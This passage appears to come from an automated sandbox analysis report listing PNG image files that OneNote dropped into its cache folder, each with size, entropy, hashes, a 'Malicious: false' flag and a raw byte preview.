                                                                                                                                                                                                          Preview:.PNG........IHDR.............._......sRGB.........gAMA......a.....pHYs..........o.d..W.IDATx^..i.=YY6z@..DP.i.IAA........l.Dd0"p0.ON.~....s>.?zbH8..%$`....b7..=....25*.".L. ..u_..f...j.........Uk..^UW]...u..}.{.]t.-.(...J......e...t.....@i.k......_.(.....@...Z.6J......2.O.-P....._.u.=T..4p...e..q..5^f~....@i`....?.....@i..k.........?...u..O|bN.~?MbT%...@.LO.Or.`....$..y.{..o....~..(.;......SNi...6....w....~.{..^w......~.S...g?../|.O........7_...Oj....|......40......9....?..<.3nw...x...g...7.....(<.d...(3.K...;....\..:...'.5.....&...>...t.;....8..SO;../...._.}.{..D.jt.......jc...s..........Z...0q...@......Z]S.(..o.....Og.u.l.i.-.9..)j..~...5.l}..........G......k....Z..c.....}.c.?.\....t+u...15p.....[|......2..;..;...........w...........v.7...I.-w...K/.J...[..N.....W..U#...._.j(...//z.|..kv....];j|../m....t.9.;-0.:.4p..@K.....~.9.$qu.E....!.9|.m.+`).|......x..vak-].../.....G'....4.>B6$.......-o.q..L;*.N+....>...=.!.Y..Q...?......7..,....}

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000011.bin

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):17289
                                                                                                                                                                                                          Entropy (8bit):7.962998633267186
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:384:ruwwXKZuqnOnZprU3+OXBruY4UkcY+TpI/BSqCrEoMXMEr3KbzHIDqqAmk+xob:tGcxE4PBruV3Uy5SqCAoMXzrQHoqAk+m
                                                                                                                                                                                                          MD5:708E8EB906BC105CCA0535AE669AA651
                                                                                                                                                                                                          SHA1:38D82DEDFE97D3001188C2E18FE13BD741FD520F
                                                                                                                                                                                                          SHA-256:1C3D07765294566E17270D0F3B9257A3DB7905D4E7EF746AEE80CD591CE0308F
                                                                                                                                                                                                          SHA-512:1EFC74C28190DEE2D2732390B74049A1B120F05EFB8DC6925207C6990AD20450FFAB40249899A9DBB82E8F92A61F770E120A450CAAC7F8C5F0742586CCE0EDB6
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..C.IDATx^...Uc.._"oB.Hr.m(.0......r..[1.D....R..q)%FBDiB.."w*.k.Jz.Y..l....>...9{.......g..Y.z~..k?.z.^k..+V...! ....(.....\sM.tD@...!P...HW.S....u^.....@.r.^.....B@...U.H.J....... }....".....>....! ..A@.4..EE...! }*...B@....i<8.....B@.T2 .........xp..! .....d@...!......(*B@....S....B ...O..QT........! ..@<.H......! ..O%.B@...x..9...C'|..{.>Z../~^.s<<V4..ujo..v.Z7..EwT.....@.....?.......~{...K.........C........bB@.$.....C.{....Kf'S.....T.*&....@<.....'..D`...;~v.DT]...r!..>....ru...}.....#uG.T.....>..z ...3v....P.M.....5.@<...?....F.}..c.W[.._!P...O..>.M.d<..J....E .}ZZ.+.5v.p>..N.{B....>M.Nzfb...OB@.." }.D.y...IdK<..! }.:.....f.K..bX.T9...&T.&?.VB9.[B@..@@.4..1}.4.@H..-!..}..~M.<.z..I}.G....>..S...N..@yj..n..s.d._.....(..R"....Wf\.oO.^...\h.\.`)...ni.'.].vk.1-.k.^....#.,}.{.RM...~Z.S.. .@U!.&}......h...{K..@.........W.8.N.s.Y.0)..f+...%4.......5.@j.):k.+3...I..(

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000012.bin

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 452 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):13737
                                                                                                                                                                                                          Entropy (8bit):7.916899917415529
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:384:jgxmx2Fa/+76A6M6Y7rSYRv47cwbkkapeIiRmDGd+gUwOSpQ:KgyoWrJWRkkRXmad+gE8Q
                                                                                                                                                                                                          MD5:830632032C7DDBCCDE126F4BAE935540
                                                                                                                                                                                                          SHA1:9FEF1DA9FF1D7762B779553B5F873BE54C8D01EF
                                                                                                                                                                                                          SHA-256:2328D09EC845433DC31808FD6B12616F1D28B9B3BA7DD969ADEB6C32D8EB049A
                                                                                                                                                                                                          SHA-512:5C17EF9A0063499F2C34FAB2C4D968D29E20F20868921FA914E5737995AA0C166F224995109FF7ACA57B5B0F8647715DC670C4AEE385F61B5F8E6E8422C49EA8
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR.............w.pl....sRGB.........gAMA......a.....pHYs..........o.d..5>IDATx^....E...,"o.....&....AY$....AE..".l....+G.>AP@D..e..".".A.Y.@...K..IXB !..!..c1.On...===3=.3=.>9O..u....w.z..-].t9]B@...!.......Z...B@...^G`.Q.&S..u$d....B.Y..P.w5[]......B.m.D...! ..@...Ls.Q"....."S....B ..D.9.(.B@.....b@...!..."..@..! ....T1 ........i. J....B@d....B@...4..%B...! 2U...! .r@@d....!......*......9 2..D...B@..L..B@..........D..! .D...! ..@...Ls.Q"....."S....B ..D.9.(.B@.....b@...!..."..@..! ....T1 ........i. J....B@d....B@...4..%B...! 2U...! .r@@d....!......*......9 2..D...B@......5jT.@.{..O.;k....>.._o.+......{V...&C..(?.m.....F....gd.....?.....3u..x^L.1n^...@../.....XE....L..!...t.....L..B.).=..sn..U........@.O..$..o..L.....g.(D...(....Lo8.....,....f;o..i.f.h.9........\./..[W.9.....+....,X..+.d.....Xc..7.p.m.Yg.u:YO.V..l.t.].Z.g.U...]...5.^..._.~.WL...o.3f..s.,Y.X.7.x5...K/-..._.......{........W.(Y....?...!....W;.....iwNMW.............@+Q.5.#.

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000013.bin

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 185 x 76, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):2332
                                                                                                                                                                                                          Entropy (8bit):7.8822150338370776
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:48:jB5Gg4vMs30WIn5IVeRy1bY7DqbqQBAeNjukXlN4AXat:PGYuEWV/YH7e1uA0AXat
                                                                                                                                                                                                          MD5:91CB7F1273AA003076401081B8A22237
                                                                                                                                                                                                          SHA1:5157144069E7D2FDAE60B397BE5851E75BDF7707
                                                                                                                                                                                                          SHA-256:80682DD6472E8D1136BC5E20F6DE87B595562414B19EAB8E965736FE992921B0
                                                                                                                                                                                                          SHA-512:5A8E3C0ED0DB94BFE359C63793F12F3D7B3C37F3A13A5C96634BA1DC8C9E50FB1142FE4752FD9FBFA39A682F78C54AF868AD337EAA787801FE5F66D8F55A8196
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR.......L.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.\.LUe......Ji("....9....-.."..5L.Y.Y.....$350.."2.lK3Cg...T..DWZ.......i.?!<..~x..z.......w.sw......9....s...w..l6.:....p"dH...F..B<...qE,R$G\!..E..".).#...."..{f.PyI.d..l;....;.=.S...O.S[.\Y^P.aj]9*Y!. ..~..#...S.s...l..h.[m....%...P..@.kG......G..X.r|%..AO.}-..G>35..c....Ac.&[W.d..+...zG........=..l...VS.d..+...tGd..k-._.....oL.:}.p.~.W$C..|...I...n...~......,.i......e..=..?{......>r~.Lw.+2..\w.)w~...c....h..u..%...PE...f..'..m.ZE.1.\....U.`X......$...P%..UH{[K..o7~.k.49..W.t.~.^_..7.,....f."q....+....;...~;.c.......Xb.\?...........0h.lV..WX!.....ljm.1c..U...[..X.)......B=.0~..W...rO..j...ehI5U:..66V5sJ.....V...]Y>...1kQH..2.........d....S....I...+..].p.....m7...Z....s.D>.K/]..?.l....2..=..~.mq..".+.....,..8. v.o.).Z......>..Xv..i...TA....M.....>[X...Y.7lJ..e7..S.....02q.O&9.......:L....N.......W....d..FqE..T..N.....R....kXv[..j......g.K.\@`.M..B}8n

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000014.bin

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):11332
                                                                                                                                                                                                          Entropy (8bit):7.9324721568775285
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:192:vpXZavBpl00n1Pt7JquG9GYHDK/5cxektxMQjcie9ZZkx30eXJIb8FKRN:vpZaDyc1P1Je9G62/5clpjre9nQkeXJY
                                                                                                                                                                                                          MD5:31579CA3352DF8FA4E3E7F48C7CDF672
                                                                                                                                                                                                          SHA1:AA682A3C781BF8EE43B5EDC9718E64CB79135F25
                                                                                                                                                                                                          SHA-256:B0E7824BEE2C896279457D87E61E902431BEB528D830524CC4DFAE126E89FC24
                                                                                                                                                                                                          SHA-512:782FF9492E3ECB11C72D316DDD94D1F3E94CD908FC9452A37DA6CA30ABCFE9AB2BCCED8583A569DA68626BCEC730408AF86997E295637BF64AFF5BC768F3E309
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..+.IDATx^.{...u./-...&....6..+z..Q."b*. &M.d-e.*.. ....J..Z-T.Z$....R..F...%*`bn..<.....W.E ..w....^...;g..[w.5w.9g...3......t8t.P.?$@.$@.5...=.8qb.... ...5...a=...#.y. ...@B.....am. .. .......$@.$`.....G.B.$@..S... ...C.zj.#[!.. ..).......!@=..........}..H.........VH..H.z.>@.$@.v.PO.pd+$@.$@=e. .. .;...v8... ...................f.o_o{....~t...n.S.N..?..._..L;J.H ..,....7.}...|....7...b...|.........ObVa1. .?.X.....~.....t2..V>.b.}..0.F....%`GO7.n#~..F....K.~...FX..H.^....k.Z/.2v.W..M.<.;$...v.t..,UO.-]............D.....o.J..Y........5.%.l....{.....'O..dC$....=uks..;{x.,.N.=.."..Q]..w>.E.H........AV=...f.&. ..ip}._0.~[pf.`..9..v.W.,..2.E.$P........+...OcC.H..=..|..[..g%(h.....W...?...UDh..T$..?....|.]..)?[Wo.h.'..2P.1..!.......$.NO.5..}...c.;...~.x,|Q....B..6.@>..y..}...m...D~z....L#.0`_.`.s?|....I.....a...=N....c.._.2.._..6 .]...5....{.^>.lM..;n...k..9J..S.G..{.

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000015.bin

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 167 x 92, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):4181
                                                                                                                                                                                                          Entropy (8bit):7.943341403425058
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:96:b6JWqvCl45Da8kuGzhRwZvwIutfij19MQ8EpW14LBGJVCq:b6JTCl45DalsBws1R8914V5q
                                                                                                                                                                                                          MD5:817D5A35EDB2B0E052194D4F49FDA19C
                                                                                                                                                                                                          SHA1:FA6CB2016C5F43B76102B63D60359139227E07EA
                                                                                                                                                                                                          SHA-256:0A87B8418B7F8E6E117BADDA11D7CDD38B8B7320C6BA3D3E9AF93EB9ACB2CE14
                                                                                                                                                                                                          SHA-512:E0686BDBFC589401F0EAAE2B1598199EFA285F8392742B1C928B9274088804B23DCB584B6FEF68CE6D7E54DFF9C10338104F4C0F3F80A04471F0B2E8F9935CC0
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR.......\......!2a....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.]iPTW..iv..D.....%DQ#A$...d..h,.T~..+...TM\cj*.)k.fj~L~$...L&...,...:.FdU..f_......._.n.m.....q.s.9.=..w.9......$..b.*..%....@A]A..%..<......l.h.+../..OSe.....]...>..C........^cCy.0nz.4<......g..?~..>.1ws.B....07W65.74T....=..v.......D....6.....tR....}]}....4z..^....7..;.."......^.....|=.#.=.32..o.<.Tn*Q....g.zN...n*...!/.........!....F..]...6...m...CX..~...+..U...E.|.........7]=rE?i(..$`e.%.`.....w._.Y...l.1...@....t.P..=.}..*...N...N.|.xS.5&.....Pe......Z.Z^XJkx.....^.....?7..._....Wsz......}G..]...\.....,[.y....}.J....'.R?a...G5..l.i.?....MH..l.DC^._.c.m.....%{;z.&.*+x;...S.....zxyH..`.._]...el^........U.T..^..p..z[.6(2x..,#;o##..}Zv|Z..............V.....0}Z....]..m.....x..).k]&e.._.W!Vry..%...I..d..}w.....^..\............m[.^.3r.......-8......j....>...Q..T..{\V\ptH.?........1..w....FHl...x.....\.`.ei.w..)`...g..V{..Z.....8..........o.._..

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000016.bin

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 221 x 77, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):2599
                                                                                                                                                                                                          Entropy (8bit):7.903700862190034
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:48:PmCwDJh8w9JewaF2zQNXXj8zq1KM43sxXxjYbTgJW1MFsrJ075CawGjGj:P1Ah8UewaFcgz82Kx8xXNYb3id/yj
                                                                                                                                                                                                          MD5:E88131C9AAC52649FF044905ACAB9B76
                                                                                                                                                                                                          SHA1:34AE73B9165CBED0DDF33AC20E4B3E7D622C19BF
                                                                                                                                                                                                          SHA-256:30F22340F582F9A352A7ED3048D1088F178E83CCAACAC1CCFD86852C8F9C78E3
                                                                                                                                                                                                          SHA-512:97AFE8F3A2A3138613934AC737C390A35F6757BFC3D381EA7C7CD148F739932380DCD46D0BA6F590C274F8BFB4D4286B3C0433AA69E090102A8A9ABDD7C97EB1
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR.......M.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.]kl.U....B|E..>...*..Q........b[.K........m.(..... ...!%1%*-B.C~(&`[.....-.....~.w3..Kw.3wvfzn.2{..s.....{w..\....!.3..:..!..../..zD.x...O.K... ^.1*...8.G...z...D.$...........>!..V..`v.CQQQ!..-L...../3.2......ZH.?s...Iu\N..,3.?.p..N......<....E.<.=z..Iu<ll.dX...g....+.{X.p.....:..t...a...cKK.|...Yszl.N.:......KPs.):).T.5...&B...*..5j``@...(_r.V.j..m...?x.sg...t\.dz.'^.=.\.h..<.y....:.I...w..ze.m.\.qPJu.....D.|..@......W..t.+.....X....e....\H+.Ns%^r.VS.N.3:...&...._..#^....d! ..F.....xc..M...q...17.z...z&C...K9(.Ifm.35.v.>.'X,...p.:=.H...J.K.,...:~...7.t.....R..R..9..?....l../.(...0z0.M.f.)H..Y_"e......B........L...q.K......|;..L.........xI.K3.M..%........./..){....R....s...7....).q.._R.4O.a3......<..%....3#.|>..y...u...R'.P..$Klz...........,...g.....`.7..\...x>.{p\;>+.,.....e.-..Re@.N..FY_....*....]}...[..h.M.oq.S.U...c_}`......8TP....

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000017.bin

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 232 x 50, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):1570
                                                                                                                                                                                                          Entropy (8bit):7.780157858994452
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:48:r+em8Tlk2APr2fEd72tTqiVJlcLzqeVzYwS:r+erTlk5S+zoyGahS
                                                                                                                                                                                                          MD5:EF9AA5B2ADBE5DF68AC4F4D716DF7708
                                                                                                                                                                                                          SHA1:363B93AAAB9DB2832F6CA0EE3C27C9310C344BA8
                                                                                                                                                                                                          SHA-256:3D94FCC4821A135ABAAE6579011441B94F9C04DAD1E66BB5211B0C019A5968B9
                                                                                                                                                                                                          SHA-512:EC9B024AEA46F7B97D14F0A7E12704D09B85F0017CC9E273CE50F2F889DFDAE81DE549CCD546BBB8F8BAAAAAB7781FEF77BF783E02CCC9605304552F7DD5903D
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR.......2......n.f....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.[MK.W...t!.fU..b!....*JBA......%-.F.4$.Nw].....E.$...)T......?@.O{...3w..y.=/"o.9...<.y...X....c.1P6..e.lx....0..J....e3.&\.@)............o.*>.E,;.....~..|....Z.3`K..W0S.&.L._..M.e.`..M.....i_.......\...6g..^....4..L.Y.9.$M...4..L.Y.9.$M...4..L.Y.9.$M...4..L.Y.9.$M...4..2.......q...&...........*.Qg.+.p.......a.:.X6...o2......A.....[).,.p......P......_..>......3.......z8j............>...fww.6....../....S<......^%.4........{.N$..`.!H....`........a..(.G^>~|txx....K\mF..'d.d:9J!.....j..i24.A...`O.......s.....?={....H'._..~..O......*>...ZXX.3...;C....\....%..s=...w<h.......0....~..y..._.......+.n.P.M]c...A..Er|.R...$.g...9*._.jg.....x...&+.JWM4xe..^....0...11.[.....f....r#.h.h$....[=t >...r....L.0.KL..B\..x........4J.0....vY...\dA. w...........g....};.}.....;.......x.|.....)......x....s....N.$.n..g<Z.q.a9.C.....oX..%,KNNN..i.8J..p].1....B>{......n.D|3t.-\g...Q

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000018.bin

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 340 x 79, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):4490
                                                                                                                                                                                                          Entropy (8bit):7.928016176674318
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:96:WXKr7Xwf6Obg+XaGOnsjbbGSb+ydWtRvEOhDE6XqPeosv02tR45boo:3rTUgXZnsHKSb+n+8DdKlwm
                                                                                                                                                                                                          MD5:7F161B19B937AB48D4FD2F6E5E16FDBD
                                                                                                                                                                                                          SHA1:BDCE4F1C73E87E609A7FDF245A512CA4F73B35B9
                                                                                                                                                                                                          SHA-256:C863C5E71D1116D69561BD0637F4FE4C4240E9CED05B8A5B056073AD13E6495D
                                                                                                                                                                                                          SHA-512:E915B76FAAC9512D2AD11CF4E4530A19BEA1C7D8508BC218C69CB041F1EEABA3E2E03B1D56E61B032A6418829752C21B8354AF1335466D7E1528A06E6742A461
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR...T...O.....;.......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..p.U..'...rD.WX.... Q.. ....."$.ZHP.Z...C...........R..%G8R..... .R.C6..A.b...0...^...#..g..........z2.....nB...l..X.&._.a,...a,...a,...a,...a,._.73'N..ukeee.6mZ.n.m.G.}...n...a.9s.DGG....y...8??.o.pE1....Y.,......).ca.i.M.:5$$.........Lr...ye........6...8...z.-r....d.(.xc..U..^11...._>.QX..y..2...T...sss1..."A.?_.;w..S.F>......4.G.......D.|...@.K...............C...k...P...q....6.`QQEE................7;;;.._\q.k.|...\.z..6j>..n....Y.&G*.n.S$))).....r........}.{[Dv:,..w..A...`..........a.~.N.f.s...P...*..'7n....eK....+.n;:.W..C..9}..O..D.q..X..5i.s~en.c..F&..?.....l.]3r...W`..#..7o..R.@^..*...W..?}t...{.B.8..D...UPa..~..C...|.C].a.9..R...c.Y0..9.u...d...C.......X.U....WK.....5...'..PM.`...<. ._.z.F^^.EH.K>_.0.d..S...Yj<..~.5.?l.fZ0.@d.....*..G...K.....e...b.|e..Q.4.....('z...!G.....2..XQx\......X...2.\h..X~.e....Z....=....C.1.......w.....d.z.

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000019.bin

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):11449
                                                                                                                                                                                                          Entropy (8bit):7.91552812501629
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:192:/zgGDSJ0ke0kBER0C31jm1OSZi6/ccccccc3zzRmKHDr1NFnAaLJ5rBX8iaD7:/UGe6m7XdJS86kvRBHD5/nAa95rB9aD7
                                                                                                                                                                                                          MD5:163E6791C87E4999C343EC5E23843B15
                                                                                                                                                                                                          SHA1:43CE3BAE19E22876483A7FD0E93DB45790373600
                                                                                                                                                                                                          SHA-256:DEB2B126977EA150E49CDB3ACF4F5387639C7B7B5583454EDF55ADF83DFAB720
                                                                                                                                                                                                          SHA-512:98BE1F4684F99A9FD2F313B09A113B5C310EC8BA8EB0EBF5FD69765E5B48B001D39999E3F25A7E76C7344DCF57B4F0BF2E4614FB0E0DFCCB6F02E6D1CAAF7FDD
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..,NIDATx^....E...@^.T.....H..$..(.!..3....O=Q...<.9.`@E...CE.(""..H.$..6.......]3......tW}U...w*~....W./. .. ..........m..H..H... ..........'...G...W.=#.M.$@.$p...........!@=U.VH..H.z.g..H........H+$@.$@=.3@.$@.j.PO.p... ...... .. .5...j8......PO..........o....+.Z.Pb.FH.......D.g\........._..'0.......9.>............&..PO.z..)-..........R....'@=U..I.&.g......../....SO.\.,._.@7Q.g.}V+../..Ht.I=..WZ%.{......_v.....%U.)^H(!!..q....|.H.E.DG_....o../...T.i...z.%.4K..# %.-.(...4J`i..,.P....F.D.zj..#..@.).(...o.....S..)..i.z.g...h..8.......A<d.z....<...n.]...E....(Jj4P;._.N..Q...)..8U.u.e).j.e...E|.]."..t6.[.K..5.6.....B..(.=W./....S'.......z.FY.. ...PO.".tI...F...Q....c.o.....}...r>..3c9I../.......}......I..G.|..|...~.b.e.5.OGb..o.....w....i.e...5&.,Z.H......g..KY.<.nZ.x...HHbdS.Z.\.O..1Q.K...9....Z.L....\g#.._~9###%%.O.>.Rvu..C.....S..g01..j...?-../...Q..N.:._....1.!

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000001C.bin

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 165 x 131, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):3679
                                                                                                                                                                                                          Entropy (8bit):7.931319059366604
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:96:tT+LtoQ9jsUBsnwlDGThUe8ww2iJiGEjdKKnnE+Gh:V+Ltt5GwlDQhUe8ww2iJi7MKnnE+K
                                                                                                                                                                                                          MD5:995CEACAD563F849C4142B6A6F29F081
                                                                                                                                                                                                          SHA1:44CB3B867CD2917541B7D5AAED2F14F10FEBB0FD
                                                                                                                                                                                                          SHA-256:3691FB8C60EA1B827092F05FBB1807E34726016C6FF56698D7B81C44D519D22A
                                                                                                                                                                                                          SHA-512:3C8EFEB966B075D06D8344483352BF92C9292F9970C9377BE254EB355EFAF017916737AECCDC704B84D532B7229F9908951A6F2CC3FAD810791CAB224401AD3D
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR.............c.L.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^....W...Gh...k.Hm..J.m....,X...Eh..%.n.....PHvy$%...[...R..l...(/..-..yl..Z.h..H!.../.|.y|w...7d3s.s.=.{.s.g.6W.^..)..@..{..'O.LL.......c.^.6xS&O.,...J.(|?...............,.$......@.zk....,.$.........)..7]O...mH7..0..|..&j..t..F...T...AZ7z.....$H...AZ7z.....$H...AZ7z.....$H...AZ7z.....$H....W.6.....0...FTcc.Wi....Q)...<.*.....{...#G....Y.f....KKK..,,,4.....{S.`...+O.[..+.\H...(.<..Qy*..ET.PM...c....~(.g..**...ol.K......Sc8..q.F.KM"<...:t.O.>b..$*t..].........2..y.h."!f.08hT..m.(..C.7n.......@....SVUU).F.).X\\....[j.U....$x$d..e...<.W......=;0L78t+..Gw..-....]......C7......K.w..._..g......A.&M.$^.#.!....e.\.P........;vD..@...Za.@*D..f...! .2w...4#.J..c....K}....F.u.I.b.V2.k...5..`....*........M..!.,.;.E..BZ....K..[7....5....,...........K...7+.6..o....\,`...z..5x...\46x.b......Y....s.^.x=.e.4s.W..t,.iu.G^.....(74....`.....:......]..&..j+t9..3..}..

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000001D.bin

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 127 x 138, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):2232
                                                                                                                                                                                                          Entropy (8bit):7.837610270261933
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:48:dFQY2WmQbe+TukEC2KgYPsWOuWFk792oP/sWtGOK9Lc+rD0NTHj:3L+wKkEOgx3PG92Eqt9LczFD
                                                                                                                                                                                                          MD5:EDB5ED43CC6038500A54B90BEC493628
                                                                                                                                                                                                          SHA1:A8CD63F3914E4347F4C5552FB922C6C03917F45F
                                                                                                                                                                                                          SHA-256:9F3312E33EB78C6952B5A5D881BBD18751FCFAC41D648C6F053CE781342A504F
                                                                                                                                                                                                          SHA-512:4EBCEFD69A4C249AA3B0F00A954C4E463DA22FC9CA0B61A0DC46079B438138C509B22188D966FFF6599A3A604858BC4CC8FE6E0685A764E8E0477AB7A237DB32
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR.....................sRGB.........gAMA......a.....pHYs..........o.d...MIDATx^..hVU..}..s:..6..9g.MM3...j...*........A..!.A.....R.Ai%YH..(M.".h.cf*.B.......:...{w.{.......y.s>.{.{.=.........#.y..r.K...K.0}......Y..b..[N.=....j.=........!......./.6....B.8....p....5P)....@......=}............^.~..@.o`n<.q.....Yw]..mg\V*...y.W.T.>...\n...s.iG.~L]..d.<.8..j<.<1..4...CZ0...}...........oDDh.....]3}#"B..O........0}B.F.L......5.f.FD..L....5.7""4`..p.........'.kt.....>!\.k.oDDh.....]3}#"B..O........0}B.F.L......5.f.FD..I..x........Z^...>B$1.N"}4.....1:&F8..*.X.yL(..s.3......~2.EL%.w.Uc.zJ...B..S..b.7o|%..7..'.....N.|..Vi...q..uO,`/....\W{..y...&iI..|X&T.........-........Z..o.~u..U....cF.M....O4}......~......:T..W.._s...t..Dlb.$Pr././.._4.b......R.T$t..$.>hB. +.{......m.w .Q...05..C.}...}.....?..h.....Y .8.6^t....}.y.%......l=$..[.~..]..h..N.......*....SB.|....8..H......_...G...|......;6YQ|WO.o.}]..'.$..oE.y...i'9.[cmS..@m@.Q

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000001E.bin

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):1604
                                                                                                                                                                                                          Entropy (8bit):7.814570704154439
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                                                                                                                          MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                                                                                                                          SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                                                                                                                          SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
